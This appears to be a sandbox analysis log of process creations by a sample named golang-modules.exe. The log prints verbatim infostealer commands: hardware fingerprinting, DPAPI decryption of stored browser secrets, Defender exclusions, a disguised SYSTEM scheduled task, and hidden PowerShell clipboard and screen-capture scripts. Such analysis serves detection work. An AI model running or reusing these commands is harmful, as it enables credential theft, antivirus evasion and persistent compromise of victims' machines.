Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "getmac /NH"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\getmac.exe getmac /NH
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl http://api.ipify.org/ --ssl-no-revoke
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic bios get smbiosbiosversion
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "type .\temp.ps1 | powershell.exe -noprofile -"Jump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"Jump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"Jump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"Jump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,27,238,165,129,143,118,17,73,148,160,219,35,119,36,236,195,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,136,189,34,74,147,133,60,232,14,60,255,73,188,213,48,222,168,142,253,158,248,133,177,139,88,77,61,151,164,102,155,199,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,5,0,199,30,189,167,167,11,187,110,144,216,122,248,70,97,140,73,214,114,118,171,5,17,181,195,185,79,195,66,51,65,48,0,0,0,136,212,114,34,12,100,149,93,133,55,135,123,14,54,78,227,90,179,39,207,67,251,86,83,147,108,45,88,219,161,237,51,30,59,93,206,64,185,123,13,105,154,32,135,149,44,94,219,64,0,0,0,199,49,210,98,232,67,7,168,248,100,118,31,55,2,255,180,150,58,185,169,41,93,199,129,193,83,93,21,116,52,166,144,1,169,141,205,12,19,247,89,22,244,86,254,137,103,207,81,105,218,121,206,85,43,186,110,147,124,58,17,202,177,238,15), $null, 'CurrentUser')"Jump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,27,238,165,129,143,118,17,73,148,160,219,35,119,36,236,195,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,114,48,216,23,247,65,248,72,100,130,9,219,134,254,84,18,107,164,226,163,43,87,125,52,191,240,241,121,131,235,218,71,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,224,87,59,108,243,241,131,144,247,29,74,239,244,87,142,220,207,13,160,113,53,133,16,157,215,235,117,188,204,140,120,98,48,0,0,0,235,75,37,254,146,41,85,133,39,254,145,97,90,225,234,59,7,139,202,215,42,131,194,189,249,170,75,32,209,29,114,59,254,150,223,30,79,234,135,238,24,207,224,182,79,115,174,112,64,0,0,0,24,20,226,74,122,126,191,107,230,158,61,85,154,10,102,70,91,12,253,79,94,192,17,255,165,216,12,239,131,138,65,20,24,71,145,99,8,244,147,146,205,194,105,171,210,214,121,132,167,177,83,117,193,131,170,21,188,247,10,130,112,109,234,10), $null, 'CurrentUser')"Jump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "wmic diskdrive get serialnumber"Jump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Steam /f"Jump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "schtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\ProgramData\edge\Updater\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM"Jump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1""Jump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"Jump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "cscript //nologo "C:\ProgramData\edge\Updater\RunBatHidden.vbs""Jump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "wmic baseboard get serialnumber"Jump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""Jump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_computersystemproduct get uuid"Jump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"Jump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "wmic PATH Win32_VideoController GET Description,PNPDeviceID"Jump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\CaptureScreens.ps1""Jump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"Jump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"Jump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"Jump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "wmic memorychip get serialnumber"Jump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"Jump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "wmic csproduct get uuid"Jump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""Jump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "wmic cpu get processorid"Jump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"Jump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "getmac /NH"Jump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"Jump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"Jump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"Jump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""Jump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\tasklist.exe tasklistJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"Jump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"Jump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "wmic memorychip get serialnumber"Jump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\CaptureScreens.ps1"Jump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,27,238,165,129,143,118,17,73,148,160,219,35,119,36,236,195,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,114,48,216,23,247,65,248,72,100,130,9,219,134,254,84,18,107,164,226,163,43,87,125,52,191,240,241,121,131,235,218,71,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,224,87,59,108,243,241,131,144,247,29,74,239,244,87,142,220,207,13,160,113,53,133,16,157,215,235,117,188,204,140,120,98,48,0,0,0,235,75,37,254,146,41,85,133,39,254,145,97,90,225,234,59,7,139,202,215,42,131,194,189,249,170,75,32,209,29,114,59,254,150,223,30,79,234,135,238,24,207,224,182,79,115,174,112,64,0,0,0,24,20,226,74,122,126,191,107,230,158,61,85,154,10,102,70,91,12,253,79,94,192,17,255,165,216,12,239,131,138,65,20,24,71,145,99,8,244,147,146,205,194,105,171,210,214,121,132,167,177,83,117,193,131,170,21,188,247,10,130,112,109,234,10), $null, 'CurrentUser')"Jump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic cpu get processoridJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"Jump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic PATH Win32_VideoController GET Description,PNPDeviceIDJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\CaptureScreens.ps1"Jump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"Jump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\CaptureScreens.ps1"Jump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath "C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\Windows"Jump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" type .\temp.ps1 "Jump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuidJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""Jump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath "C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"Jump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_computersystemproduct get uuidJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"Jump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\golang-modules.exeProcess created: unknown unknownJump to behavior
